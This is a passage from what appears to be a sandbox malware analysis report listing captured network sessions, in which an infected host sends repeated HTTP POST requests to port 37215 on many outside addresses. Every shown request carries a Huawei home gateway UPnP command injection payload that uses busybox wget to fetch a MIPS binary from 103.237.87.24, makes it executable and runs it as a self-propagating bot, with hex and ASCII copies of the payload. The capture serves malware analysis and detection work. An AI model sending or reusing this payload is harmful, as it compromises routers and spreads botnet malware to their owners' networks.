6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  61192.168.2.134028641.93.85.12937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.060941935 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  62192.168.2.1332860157.127.243.8337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.060946941 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  63192.168.2.1351084197.144.24.24537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.060971975 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  64192.168.2.134490641.61.223.23537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.060982943 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  65192.168.2.133500641.2.78.6637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.061002016 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  66192.168.2.1333162157.253.34.2437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.061189890 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  67192.168.2.1337166157.169.180.1037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.061211109 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  68192.168.2.133895641.221.110.14037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.061218977 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  69192.168.2.1345310197.86.184.13737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.061229944 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  70192.168.2.134881041.29.253.25337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.061259985 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  71192.168.2.1357780157.75.126.7637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.061337948 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
